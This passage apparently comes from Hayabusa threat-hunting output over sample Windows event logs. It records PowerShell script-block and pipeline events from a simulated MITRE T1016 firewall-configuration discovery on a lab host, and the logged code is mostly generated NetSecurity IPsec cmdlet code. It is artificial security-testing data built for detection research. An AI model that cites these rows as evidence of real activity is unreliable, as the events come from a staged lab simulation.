[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper 
$PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) 
{ [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; Param",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; 
value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,eterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { 
[object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue =,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 